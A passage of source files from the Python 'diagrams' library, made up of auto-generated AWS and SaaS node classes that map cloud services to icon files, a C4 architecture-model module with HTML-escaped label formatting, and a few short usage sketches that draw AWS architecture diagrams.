"sagemaker.png" class TensorflowOnAWS(_ML): _icon = "tensorflow-on-aws.png" class Textract(_ML): _icon = "textract.png" class Transcribe(_ML): _icon = "transcribe.png" class Translate(_ML): _icon = "translate.png" # Aliases DLC = DeepLearningContainers File: diagrams/aws/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Devtools(_AWS): _type = "devtools" _icon_dir = "resources/aws/devtools" class CloudDevelopmentKit(_Devtools): _icon = "cloud-development-kit.png" class Cloud9Resource(_Devtools): _icon = "cloud9-resource.png" class Cloud9(_Devtools): _icon = "cloud9.png" class Codebuild(_Devtools): _icon = "codebuild.png" class Codecommit(_Devtools): _icon = "codecommit.png" class Codedeploy(_Devtools): _icon = "codedeploy.png" class Codepipeline(_Devtools): _icon = "codepipeline.png" class Codestar(_Devtools): _icon = "codestar.png" class CommandLineInterface(_Devtools): _icon = "command-line-interface.png" class DeveloperTools(_Devtools): _icon = "developer-tools.png" class ToolsAndSdks(_Devtools): _icon = "tools-and-sdks.png" class XRay(_Devtools): _icon = "x-ray.png" # Aliases CLI = CommandLineInterface DevTools = DeveloperTools File: diagrams/aws/business.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Business(_AWS): _type = "business" _icon_dir = "resources/aws/business" class AlexaForBusiness(_Business): _icon = "alexa-for-business.png" class BusinessApplications(_Business): _icon = "business-applications.png" class Chime(_Business): _icon = "chime.png" class Workmail(_Business): _icon = "workmail.png" # Aliases A4B = AlexaForBusiness File: diagrams/aws/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
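# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A short SageMaker workflow drawn with the ML nodes above; notebook,
# training job and model are chained left to right. `diagrams.Diagram` is
# assumed from the top-level package.
from diagrams import Diagram
from diagrams.aws.ml import SagemakerModel, SagemakerNotebook, SagemakerTrainingJob

with Diagram("sagemaker_workflow", show=False):
    notebook = SagemakerNotebook("explore")
    training = SagemakerTrainingJob("train")
    model = SagemakerModel("model")

    notebook >> training >> model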
import _AWS class _Storage(_AWS): _type = "storage" _icon_dir = "resources/aws/storage" class Backup(_Storage): _icon = "backup.png" class CloudendureDisasterRecovery(_Storage): _icon = "cloudendure-disaster-recovery.png" class EFSInfrequentaccessPrimaryBg(_Storage): _icon = "efs-infrequentaccess-primary-bg.png" class EFSStandardPrimaryBg(_Storage): _icon = "efs-standard-primary-bg.png" class ElasticBlockStoreEBSSnapshot(_Storage): _icon = "elastic-block-store-ebs-snapshot.png" class ElasticBlockStoreEBSVolume(_Storage): _icon = "elastic-block-store-ebs-volume.png" class ElasticBlockStoreEBS(_Storage): _icon = "elastic-block-store-ebs.png" class ElasticFileSystemEFSFileSystem(_Storage): _icon = "elastic-file-system-efs-file-system.png" class ElasticFileSystemEFS(_Storage): _icon = "elastic-file-system-efs.png" class FsxForLustre(_Storage): _icon = "fsx-for-lustre.png" class FsxForWindowsFileServer(_Storage): _icon = "fsx-for-windows-file-server.png" class Fsx(_Storage): _icon = "fsx.png" class MultipleVolumesResource(_Storage): _icon = "multiple-volumes-resource.png" class S3GlacierArchive(_Storage): _icon = "s3-glacier-archive.png" class S3GlacierVault(_Storage): _icon = "s3-glacier-vault.png" class S3Glacier(_Storage): _icon = "s3-glacier.png" class SimpleStorageServiceS3BucketWithObjects(_Storage): _icon = "simple-storage-service-s3-bucket-with-objects.png" class SimpleStorageServiceS3Bucket(_Storage): _icon = "simple-storage-service-s3-bucket.png" class SimpleStorageServiceS3Object(_Storage): _icon = "simple-storage-service-s3-object.png" class SimpleStorageServiceS3(_Storage): _icon = "simple-storage-service-s3.png" class SnowFamilySnowballImportExport(_Storage): _icon = "snow-family-snowball-import-export.png" class SnowballEdge(_Storage): _icon = "snowball-edge.png" class Snowball(_Storage): _icon = "snowball.png" class Snowmobile(_Storage): _icon = "snowmobile.png" class StorageGatewayCachedVolume(_Storage): _icon = "storage-gateway-cached-volume.png" class StorageGatewayNonCachedVolume(_Storage): _icon = "storage-gateway-non-cached-volume.png" class StorageGatewayVirtualTapeLibrary(_Storage): _icon = "storage-gateway-virtual-tape-library.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" class Storage(_Storage): _icon = "storage.png" # Aliases CDR = CloudendureDisasterRecovery EBS = ElasticBlockStoreEBS EFS = ElasticFileSystemEFS FSx = Fsx S3 = SimpleStorageServiceS3 File: diagrams/aws/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
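# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A storage lifecycle diagram using the AWS storage aliases above
# (StorageGateway, S3, S3Glacier, Backup); the flow is illustrative, with
# `diagrams.Diagram` assumed from the top-level package.
from diagrams import Diagram
from diagrams.aws.storage import S3, Backup, S3Glacier, StorageGateway

with Diagram("storage_lifecycle", show=False):
    gateway = StorageGateway("on-prem gateway")
    bucket = S3("bucket")
    archive = S3Glacier("archive")
    backup = Backup("backup plan")

    gateway >> bucket >> archive
    bucket >> backup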
import _AWS class _Network(_AWS): _type = "network" _icon_dir = "resources/aws/network" class APIGatewayEndpoint(_Network): _icon = "api-gateway-endpoint.png" class APIGateway(_Network): _icon = "api-gateway.png" class AppMesh(_Network): _icon = "app-mesh.png" class ClientVpn(_Network): _icon = "client-vpn.png" class CloudMap(_Network): _icon = "cloud-map.png" class CloudFrontDownloadDistribution(_Network): _icon = "cloudfront-download-distribution.png" class CloudFrontEdgeLocation(_Network): _icon = "cloudfront-edge-location.png" class CloudFrontStreamingDistribution(_Network): _icon = "cloudfront-streaming-distribution.png" class CloudFront(_Network): _icon = "cloudfront.png" class DirectConnect(_Network): _icon = "direct-connect.png" class ElasticLoadBalancing(_Network): _icon = "elastic-load-balancing.png" class ElbApplicationLoadBalancer(_Network): _icon = "elb-application-load-balancer.png" class ElbClassicLoadBalancer(_Network): _icon = "elb-classic-load-balancer.png" class ElbNetworkLoadBalancer(_Network): _icon = "elb-network-load-balancer.png" class Endpoint(_Network): _icon = "endpoint.png" class GlobalAccelerator(_Network): _icon = "global-accelerator.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class Nacl(_Network): _icon = "nacl.png" class NATGateway(_Network): _icon = "nat-gateway.png" class NetworkingAndContentDelivery(_Network): _icon = "networking-and-content-delivery.png" class PrivateSubnet(_Network): _icon = "private-subnet.png" class Privatelink(_Network): _icon = "privatelink.png" class PublicSubnet(_Network): _icon = "public-subnet.png" class Route53HostedZone(_Network): _icon = "route-53-hosted-zone.png" class Route53(_Network): _icon = "route-53.png" class RouteTable(_Network): _icon = "route-table.png" class SiteToSiteVpn(_Network): _icon = "site-to-site-vpn.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class VPCCustomerGateway(_Network): _icon = "vpc-customer-gateway.png" class VPCElasticNetworkAdapter(_Network): _icon = "vpc-elastic-network-adapter.png" class VPCElasticNetworkInterface(_Network): _icon = "vpc-elastic-network-interface.png" class VPCFlowLogs(_Network): _icon = "vpc-flow-logs.png" class VPCPeering(_Network): _icon = "vpc-peering.png" class VPCRouter(_Network): _icon = "vpc-router.png" class VPCTrafficMirroring(_Network): _icon = "vpc-traffic-mirroring.png" class VPC(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CF = CloudFront ELB = ElasticLoadBalancing ALB = ElbApplicationLoadBalancer CLB = ElbClassicLoadBalancer NLB = ElbNetworkLoadBalancer GAX = GlobalAccelerator File: diagrams/aws/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
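# --- Usage sketch (editorial addition, not part of the generated modules) ---
# An edge-routing diagram using the AWS network aliases above (Route53,
# CloudFront, ALB, PrivateSubnet). The `Cluster` grouping context manager,
# like `Diagram`, is assumed from the top-level diagrams package.
from diagrams import Cluster, Diagram
from diagrams.aws.network import ALB, CloudFront, PrivateSubnet, Route53

with Diagram("edge_routing", show=False):
    dns = Route53("dns")
    cdn = CloudFront("cdn")
    with Cluster("vpc"):
        alb = ALB("alb")
        app = PrivateSubnet("app subnet")

    dns >> cdn >> alb >> app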
import _AWS class _Management(_AWS): _type = "management" _icon_dir = "resources/aws/management" class AutoScaling(_Management): _icon = "auto-scaling.png" class Chatbot(_Management): _icon = "chatbot.png" class CloudformationChangeSet(_Management): _icon = "cloudformation-change-set.png" class CloudformationStack(_Management): _icon = "cloudformation-stack.png" class CloudformationTemplate(_Management): _icon = "cloudformation-template.png" class Cloudformation(_Management): _icon = "cloudformation.png" class Cloudtrail(_Management): _icon = "cloudtrail.png" class CloudwatchAlarm(_Management): _icon = "cloudwatch-alarm.png" class CloudwatchEventEventBased(_Management): _icon = "cloudwatch-event-event-based.png" class CloudwatchEventTimeBased(_Management): _icon = "cloudwatch-event-time-based.png" class CloudwatchRule(_Management): _icon = "cloudwatch-rule.png" class Cloudwatch(_Management): _icon = "cloudwatch.png" class Codeguru(_Management): _icon = "codeguru.png" class CommandLineInterface(_Management): _icon = "command-line-interface.png" class Config(_Management): _icon = "config.png" class ControlTower(_Management): _icon = "control-tower.png" class LicenseManager(_Management): _icon = "license-manager.png" class ManagedServices(_Management): _icon = "managed-services.png" class ManagementAndGovernance(_Management): _icon = "management-and-governance.png" class ManagementConsole(_Management): _icon = "management-console.png" class OpsworksApps(_Management): _icon = "opsworks-apps.png" class OpsworksDeployments(_Management): _icon = "opsworks-deployments.png" class OpsworksInstances(_Management): _icon = "opsworks-instances.png" class OpsworksLayers(_Management): _icon = "opsworks-layers.png" class OpsworksMonitoring(_Management): _icon = "opsworks-monitoring.png" class OpsworksPermissions(_Management): _icon = "opsworks-permissions.png" class OpsworksResources(_Management): _icon = "opsworks-resources.png" class OpsworksStack(_Management): _icon = "opsworks-stack.png" class Opsworks(_Management): _icon = "opsworks.png" class OrganizationsAccount(_Management): _icon = "organizations-account.png" class OrganizationsOrganizationalUnit(_Management): _icon = "organizations-organizational-unit.png" class Organizations(_Management): _icon = "organizations.png" class PersonalHealthDashboard(_Management): _icon = "personal-health-dashboard.png" class ServiceCatalog(_Management): _icon = "service-catalog.png" class SystemsManagerAutomation(_Management): _icon = "systems-manager-automation.png" class SystemsManagerDocuments(_Management): _icon = "systems-manager-documents.png" class SystemsManagerInventory(_Management): _icon = "systems-manager-inventory.png" class SystemsManagerMaintenanceWindows(_Management): _icon = "systems-manager-maintenance-windows.png" class SystemsManagerOpscenter(_Management): _icon = "systems-manager-opscenter.png" class SystemsManagerParameterStore(_Management): _icon = "systems-manager-parameter-store.png" class SystemsManagerPatchManager(_Management): _icon = "systems-manager-patch-manager.png" class SystemsManagerRunCommand(_Management): _icon = "systems-manager-run-command.png" class SystemsManagerStateManager(_Management): _icon = "systems-manager-state-manager.png" class SystemsManager(_Management): _icon = "systems-manager.png" class TrustedAdvisorChecklistCost(_Management): _icon = "trusted-advisor-checklist-cost.png" class TrustedAdvisorChecklistFaultTolerant(_Management): _icon = "trusted-advisor-checklist-fault-tolerant.png" class 
TrustedAdvisorChecklistPerformance(_Management): _icon = "trusted-advisor-checklist-performance.png" class TrustedAdvisorChecklistSecurity(_Management): _icon = "trusted-advisor-checklist-security.png" class TrustedAdvisorChecklist(_Management): _icon = "trusted-advisor-checklist.png" class TrustedAdvisor(_Management): _icon = "trusted-advisor.png" class WellArchitectedTool(_Management): _icon = "well-architected-tool.png" # Aliases SSM = SystemsManager ParameterStore = SystemsManagerParameterStore File: diagrams/aws/ar.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Ar(_AWS): _type = "ar" _icon_dir = "resources/aws/ar" class ArVr(_Ar): _icon = "ar-vr.png" class Sumerian(_Ar): _icon = "sumerian.png" # Aliases File: diagrams/aws/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Blockchain(_AWS): _type = "blockchain" _icon_dir = "resources/aws/blockchain" class BlockchainResource(_Blockchain): _icon = "blockchain-resource.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class ManagedBlockchain(_Blockchain): _icon = "managed-blockchain.png" class QuantumLedgerDatabaseQldb(_Blockchain): _icon = "quantum-ledger-database-qldb.png" # Aliases QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Analytics(_AWS): _type = "analytics" _icon_dir = "resources/aws/analytics" class Analytics(_Analytics): _icon = "analytics.png" class Athena(_Analytics): _icon = "athena.png" class CloudsearchSearchDocuments(_Analytics): _icon = "cloudsearch-search-documents.png" class Cloudsearch(_Analytics): _icon = "cloudsearch.png" class DataLakeResource(_Analytics): _icon = "data-lake-resource.png" class DataPipeline(_Analytics): _icon = "data-pipeline.png" class ElasticsearchService(_Analytics): _icon = "elasticsearch-service.png" class EMRCluster(_Analytics): _icon = "emr-cluster.png" class EMREngineMaprM3(_Analytics): _icon = "emr-engine-mapr-m3.png" class EMREngineMaprM5(_Analytics): _icon = "emr-engine-mapr-m5.png" class EMREngineMaprM7(_Analytics): _icon = "emr-engine-mapr-m7.png" class EMREngine(_Analytics): _icon = "emr-engine.png" class EMRHdfsCluster(_Analytics): _icon = "emr-hdfs-cluster.png" class EMR(_Analytics): _icon = "emr.png" class GlueCrawlers(_Analytics): _icon = "glue-crawlers.png" class GlueDataCatalog(_Analytics): _icon = "glue-data-catalog.png" class Glue(_Analytics): _icon = "glue.png" class KinesisDataAnalytics(_Analytics): _icon = "kinesis-data-analytics.png" class KinesisDataFirehose(_Analytics): _icon = "kinesis-data-firehose.png" class KinesisDataStreams(_Analytics): _icon = "kinesis-data-streams.png" class KinesisVideoStreams(_Analytics): _icon = "kinesis-video-streams.png" class Kinesis(_Analytics): _icon = "kinesis.png" class LakeFormation(_Analytics): _icon = "lake-formation.png" class ManagedStreamingForKafka(_Analytics): _icon = "managed-streaming-for-kafka.png" class Quicksight(_Analytics): _icon = "quicksight.png" class RedshiftDenseComputeNode(_Analytics): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Analytics): _icon = "redshift-dense-storage-node.png" class Redshift(_Analytics): _icon = "redshift.png" # Aliases ES = ElasticsearchService File: diagrams/aws/quantum.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Quantum(_AWS): _type = "quantum" _icon_dir = "resources/aws/quantum" class Braket(_Quantum): _icon = "braket.png" class QuantumTechnologies(_Quantum): _icon = "quantum-technologies.png" # Aliases File: diagrams/aws/cost.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Cost(_AWS): _type = "cost" _icon_dir = "resources/aws/cost" class Budgets(_Cost): _icon = "budgets.png" class CostAndUsageReport(_Cost): _icon = "cost-and-usage-report.png" class CostExplorer(_Cost): _icon = "cost-explorer.png" class CostManagement(_Cost): _icon = "cost-management.png" class ReservedInstanceReporting(_Cost): _icon = "reserved-instance-reporting.png" class SavingsPlans(_Cost): _icon = "savings-plans.png" # Aliases File: diagrams/aws/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Migration(_AWS): _type = "migration" _icon_dir = "resources/aws/migration" class ApplicationDiscoveryService(_Migration): _icon = "application-discovery-service.png" class CloudendureMigration(_Migration): _icon = "cloudendure-migration.png" class DatabaseMigrationService(_Migration): _icon = "database-migration-service.png" class DatasyncAgent(_Migration): _icon = "datasync-agent.png" class Datasync(_Migration): _icon = "datasync.png" class MigrationAndTransfer(_Migration): _icon = "migration-and-transfer.png" class MigrationHub(_Migration): _icon = "migration-hub.png" class ServerMigrationService(_Migration): _icon = "server-migration-service.png" class SnowballEdge(_Migration): _icon = "snowball-edge.png" class Snowball(_Migration): _icon = "snowball.png" class Snowmobile(_Migration): _icon = "snowmobile.png" class TransferForSftp(_Migration): _icon = "transfer-for-sftp.png" # Aliases ADS = ApplicationDiscoveryService CEM = CloudendureMigration DMS = DatabaseMigrationService MAT = MigrationAndTransfer SMS = ServerMigrationService File: diagrams/aws/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Iot(_AWS): _type = "iot" _icon_dir = "resources/aws/iot" class Freertos(_Iot): _icon = "freertos.png" class InternetOfThings(_Iot): _icon = "internet-of-things.png" class Iot1Click(_Iot): _icon = "iot-1-click.png" class IotAction(_Iot): _icon = "iot-action.png" class IotActuator(_Iot): _icon = "iot-actuator.png" class IotAlexaEcho(_Iot): _icon = "iot-alexa-echo.png" class IotAlexaEnabledDevice(_Iot): _icon = "iot-alexa-enabled-device.png" class IotAlexaSkill(_Iot): _icon = "iot-alexa-skill.png" class IotAlexaVoiceService(_Iot): _icon = "iot-alexa-voice-service.png" class IotAnalyticsChannel(_Iot): _icon = "iot-analytics-channel.png" class IotAnalyticsDataSet(_Iot): _icon = "iot-analytics-data-set.png" class IotAnalyticsDataStore(_Iot): _icon = "iot-analytics-data-store.png" class IotAnalyticsNotebook(_Iot): _icon = "iot-analytics-notebook.png" class IotAnalyticsPipeline(_Iot): _icon = "iot-analytics-pipeline.png" class IotAnalytics(_Iot): _icon = "iot-analytics.png" class IotBank(_Iot): _icon = "iot-bank.png" class IotBicycle(_Iot): _icon = "iot-bicycle.png" class IotButton(_Iot): _icon = "iot-button.png" class IotCamera(_Iot): _icon = "iot-camera.png" class IotCar(_Iot): _icon = "iot-car.png" class IotCart(_Iot): _icon = "iot-cart.png" class IotCertificate(_Iot): _icon = "iot-certificate.png" class IotCoffeePot(_Iot): _icon = "iot-coffee-pot.png" class IotCore(_Iot): _icon = "iot-core.png" class IotDesiredState(_Iot): _icon = "iot-desired-state.png" class IotDeviceDefender(_Iot): _icon = "iot-device-defender.png" class IotDeviceGateway(_Iot): _icon = "iot-device-gateway.png" class IotDeviceManagement(_Iot): _icon = "iot-device-management.png" class IotDoorLock(_Iot): _icon = "iot-door-lock.png" class IotEvents(_Iot): _icon = "iot-events.png" class IotFactory(_Iot): _icon = "iot-factory.png" class IotFireTvStick(_Iot): _icon = "iot-fire-tv-stick.png" class IotFireTv(_Iot): _icon = "iot-fire-tv.png" class IotGeneric(_Iot): _icon = "iot-generic.png" class IotGreengrassConnector(_Iot): _icon = "iot-greengrass-connector.png" class IotGreengrass(_Iot): _icon = "iot-greengrass.png" class IotHardwareBoard(_Iot): _icon = "iot-hardware-board.png" class IotHouse(_Iot): _icon = "iot-house.png" class IotHttp(_Iot): _icon = "iot-http.png" class IotHttp2(_Iot): _icon = "iot-http2.png" class IotJobs(_Iot): _icon = "iot-jobs.png" class IotLambda(_Iot): _icon = "iot-lambda.png" class IotLightbulb(_Iot): _icon = "iot-lightbulb.png" class IotMedicalEmergency(_Iot): _icon = "iot-medical-emergency.png" class IotMqtt(_Iot): _icon = "iot-mqtt.png" class IotOverTheAirUpdate(_Iot): _icon = "iot-over-the-air-update.png" class IotPolicyEmergency(_Iot): _icon = "iot-policy-emergency.png" class IotPolicy(_Iot): _icon = "iot-policy.png" class IotReportedState(_Iot): _icon = "iot-reported-state.png" class IotRule(_Iot): _icon = "iot-rule.png" class IotSensor(_Iot): _icon = "iot-sensor.png" class IotServo(_Iot): _icon = "iot-servo.png" class IotShadow(_Iot): _icon = "iot-shadow.png" class IotSimulator(_Iot): _icon = "iot-simulator.png" class IotSitewise(_Iot): _icon = "iot-sitewise.png" class IotThermostat(_Iot): _icon = "iot-thermostat.png" class IotThingsGraph(_Iot): _icon = "iot-things-graph.png" class IotTopic(_Iot): _icon = "iot-topic.png" class IotTravel(_Iot): _icon = "iot-travel.png" class IotUtility(_Iot): _icon = "iot-utility.png" class IotWindfarm(_Iot): _icon = "iot-windfarm.png" # Aliases FreeRTOS = Freertos IotBoard = IotHardwareBoard File: diagrams/aws/general.py # This module is 
automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _General(_AWS): _type = "general" _icon_dir = "resources/aws/general" class Client(_General): _icon = "client.png" class Disk(_General): _icon = "disk.png" class Forums(_General): _icon = "forums.png" class General(_General): _icon = "general.png" class GenericDatabase(_General): _icon = "generic-database.png" class GenericFirewall(_General): _icon = "generic-firewall.png" class GenericOfficeBuilding(_General): _icon = "generic-office-building.png" class GenericSamlToken(_General): _icon = "generic-saml-token.png" class GenericSDK(_General): _icon = "generic-sdk.png" class InternetAlt1(_General): _icon = "internet-alt1.png" class InternetAlt2(_General): _icon = "internet-alt2.png" class InternetGateway(_General): _icon = "internet-gateway.png" class Marketplace(_General): _icon = "marketplace.png" class MobileClient(_General): _icon = "mobile-client.png" class Multimedia(_General): _icon = "multimedia.png" class OfficeBuilding(_General): _icon = "office-building.png" class SamlToken(_General): _icon = "saml-token.png" class SDK(_General): _icon = "sdk.png" class SslPadlock(_General): _icon = "ssl-padlock.png" class TapeStorage(_General): _icon = "tape-storage.png" class Toolkit(_General): _icon = "toolkit.png" class TraditionalServer(_General): _icon = "traditional-server.png" class User(_General): _icon = "user.png" class Users(_General): _icon = "users.png" # Aliases OfficeBuilding = GenericOfficeBuilding File: diagrams/aws/engagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Engagement(_AWS): _type = "engagement" _icon_dir = "resources/aws/engagement" class Connect(_Engagement): _icon = "connect.png" class CustomerEngagement(_Engagement): _icon = "customer-engagement.png" class Pinpoint(_Engagement): _icon = "pinpoint.png" class SimpleEmailServiceSesEmail(_Engagement): _icon = "simple-email-service-ses-email.png" class SimpleEmailServiceSes(_Engagement): _icon = "simple-email-service-ses.png" # Aliases SES = SimpleEmailServiceSes File: diagrams/aws/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AWS class _Compute(_AWS): _type = "compute" _icon_dir = "resources/aws/compute" class AppRunner(_Compute): _icon = "app-runner.png" class ApplicationAutoScaling(_Compute): _icon = "application-auto-scaling.png" class Batch(_Compute): _icon = "batch.png" class ComputeOptimizer(_Compute): _icon = "compute-optimizer.png" class Compute(_Compute): _icon = "compute.png" class EC2Ami(_Compute): _icon = "ec2-ami.png" class EC2AutoScaling(_Compute): _icon = "ec2-auto-scaling.png" class EC2ContainerRegistryImage(_Compute): _icon = "ec2-container-registry-image.png" class EC2ContainerRegistryRegistry(_Compute): _icon = "ec2-container-registry-registry.png" class EC2ContainerRegistry(_Compute): _icon = "ec2-container-registry.png" class EC2ElasticIpAddress(_Compute): _icon = "ec2-elastic-ip-address.png" class EC2ImageBuilder(_Compute): _icon = "ec2-image-builder.png" class EC2Instance(_Compute): _icon = "ec2-instance.png" class EC2Instances(_Compute): _icon = "ec2-instances.png" class EC2Rescue(_Compute): _icon = "ec2-rescue.png" class EC2SpotInstance(_Compute): _icon = "ec2-spot-instance.png" class EC2(_Compute): _icon = "ec2.png" class ElasticBeanstalkApplication(_Compute): _icon = "elastic-beanstalk-application.png" class ElasticBeanstalkDeployment(_Compute): _icon = "elastic-beanstalk-deployment.png" class ElasticBeanstalk(_Compute): _icon = "elastic-beanstalk.png" class ElasticContainerServiceContainer(_Compute): _icon = "elastic-container-service-container.png" class ElasticContainerServiceService(_Compute): _icon = "elastic-container-service-service.png" class ElasticContainerService(_Compute): _icon = "elastic-container-service.png" class ElasticKubernetesService(_Compute): _icon = "elastic-kubernetes-service.png" class Fargate(_Compute): _icon = "fargate.png" class LambdaFunction(_Compute): _icon = "lambda-function.png" class Lambda(_Compute): _icon = "lambda.png" class Lightsail(_Compute): _icon = "lightsail.png" class LocalZones(_Compute): _icon = "local-zones.png" class Outposts(_Compute): _icon = "outposts.png" class ServerlessApplicationRepository(_Compute): _icon = "serverless-application-repository.png" class ThinkboxDeadline(_Compute): _icon = "thinkbox-deadline.png" class ThinkboxDraft(_Compute): _icon = "thinkbox-draft.png" class ThinkboxFrost(_Compute): _icon = "thinkbox-frost.png" class ThinkboxKrakatoa(_Compute): _icon = "thinkbox-krakatoa.png" class ThinkboxSequoia(_Compute): _icon = "thinkbox-sequoia.png" class ThinkboxStoke(_Compute): _icon = "thinkbox-stoke.png" class ThinkboxXmesh(_Compute): _icon = "thinkbox-xmesh.png" class VmwareCloudOnAWS(_Compute): _icon = "vmware-cloud-on-aws.png" class Wavelength(_Compute): _icon = "wavelength.png" # Aliases AutoScaling = ApplicationAutoScaling AMI = EC2Ami ECR = EC2ContainerRegistry EB = ElasticBeanstalk ECS = ElasticContainerService EKS = ElasticKubernetesService SAR = ServerlessApplicationRepository File: diagrams/c4/__init__.py """ A set of nodes and edges to visualize software architecture using the C4 model. 
""" import html import textwrap from diagrams import Cluster, Node, Edge def _format_node_label(name, key, description): """Create a graphviz label string for a C4 node""" title = f'<font point-size="12"><b>{html.escape(name)}</b></font><br/>' subtitle = f'<font point-size="9">[{html.escape(key)}]<br/></font>' if key else "" text = f'<br/><font point-size="10">{_format_description(description)}</font>' if description else "" return f"<{title}{subtitle}{text}>" def _format_description(description): """ Formats the description string so it fits into the C4 nodes. It line-breaks the description so it fits onto exactly three lines. If there are more than three lines, all further lines are discarded and "..." inserted on the last line to indicate that it was shortened. This will also html-escape the description so it can safely be included in a HTML label. """ wrapper = textwrap.TextWrapper(width=40, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] lines += [""] * (3 - len(lines)) # fill up with empty lines so it is always three return "<br/>".join(lines) def _format_edge_label(description): """Create a graphviz label string for a C4 edge""" wrapper = textwrap.TextWrapper(width=24, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] text = "<br/>".join(lines) return f'<<font point-size="10">{text}</font>>' def C4Node(name, technology="", description="", type="Container", **kwargs): key = f"{type}: {technology}" if technology else type node_attributes = { "label": _format_node_label(name, key, description), "labelloc": "c", "shape": "rect", "width": "2.6", "height": "1.6", "fixedsize": "true", "style": "filled", "fillcolor": "dodgerblue3", "fontcolor": "white", } # collapse boxes to a smaller form if they don't have a description if not description: node_attributes.update({"width": "2", "height": "1"}) node_attributes.update(kwargs) return Node(**node_attributes) def Container(name, technology="", description="", **kwargs): container_attributes = { "name": name, "technology": technology, "description": description, "type": "Container", } container_attributes.update(kwargs) return C4Node(**container_attributes) def Database(name, technology="", description="", **kwargs): database_attributes = { "name": name, "technology": technology, "description": description, "type": "Database", "shape": "cylinder", "labelloc": "b", } database_attributes.update(kwargs) return C4Node(**database_attributes) def System(name, description="", external=False, **kwargs): system_attributes = { "name": name, "description": description, "type": "External System" if external else "System", "fillcolor": "gray60" if external else "dodgerblue4", } system_attributes.update(kwargs) return C4Node(**system_attributes) def Person(name, description="", external=False, **kwargs): person_attributes = { "name": name, "description": description, "type": "External Person" if external else "Person", "fillcolor": "gray60" if external else "dodgerblue4", "style": "rounded,filled", } person_attributes.update(kwargs) return C4Node(**person_attributes) def SystemBoundary(name, **kwargs): graph_attributes = { "label": html.escape(name), "bgcolor": "white", "margin": "16", "style": "dashed", } graph_attributes.update(kwargs) return Cluster(name, graph_attr=graph_attributes) def Relationship(label="", **kwargs): edge_attributes = { "style": "dashed", "color": "gray60", "label": _format_edge_label(label) if label else "", } edge_attributes.update(kwargs) return Edge(**edge_attributes) 
File: diagrams/custom/__init__.py """ Custom provides the possibility of load an image to be presented as a node. """ from diagrams import Node class Custom(Node): _provider = "custom" _type = "custom" _icon_dir = None fontcolor = "#ffffff" def _load_icon(self): return self._icon def __init__(self, label, icon_path, *args, **kwargs): self._icon = icon_path super().__init__(label, *args, **kwargs) File: diagrams/saas/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Logging(_Saas): _type = "logging" _icon_dir = "resources/saas/logging" class Datadog(_Logging): _icon = "datadog.png" class Newrelic(_Logging): _icon = "newrelic.png" class Papertrail(_Logging): _icon = "papertrail.png" # Aliases DataDog = Datadog NewRelic = Newrelic File: diagrams/saas/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Media(_Saas): _type = "media" _icon_dir = "resources/saas/media" class Cloudinary(_Media): _icon = "cloudinary.png" # Aliases File: diagrams/saas/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Social(_Saas): _type = "social" _icon_dir = "resources/saas/social" class Facebook(_Social): _icon = "facebook.png" class Twitter(_Social): _icon = "twitter.png" # Aliases File: diagrams/saas/filesharing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Filesharing(_Saas): _type = "filesharing" _icon_dir = "resources/saas/filesharing" class Nextcloud(_Filesharing): _icon = "nextcloud.png" # Aliases File: diagrams/saas/__init__.py """ Saas provides a set of general saas services. """ from diagrams import Node class _Saas(Node): _provider = "saas" _icon_dir = "resources/saas" fontcolor = "#ffffff" File: diagrams/saas/recommendation.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Recommendation(_Saas): _type = "recommendation" _icon_dir = "resources/saas/recommendation" class Recombee(_Recommendation): _icon = "recombee.png" # Aliases File: diagrams/saas/chat.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Chat(_Saas): _type = "chat" _icon_dir = "resources/saas/chat" class Discord(_Chat): _icon = "discord.png" class Line(_Chat): _icon = "line.png" class Mattermost(_Chat): _icon = "mattermost.png" class Messenger(_Chat): _icon = "messenger.png" class RocketChat(_Chat): _icon = "rocket-chat.png" class Slack(_Chat): _icon = "slack.png" class Teams(_Chat): _icon = "teams.png" class Telegram(_Chat): _icon = "telegram.png" # Aliases File: diagrams/saas/cdn.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Cdn(_Saas): _type = "cdn" _icon_dir = "resources/saas/cdn" class Akamai(_Cdn): _icon = "akamai.png" class Cloudflare(_Cdn): _icon = "cloudflare.png" class Fastly(_Cdn): _icon = "fastly.png" # Aliases File: diagrams/saas/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Communication(_Saas): _type = "communication" _icon_dir = "resources/saas/communication" class Twilio(_Communication): _icon = "twilio.png" # Aliases File: 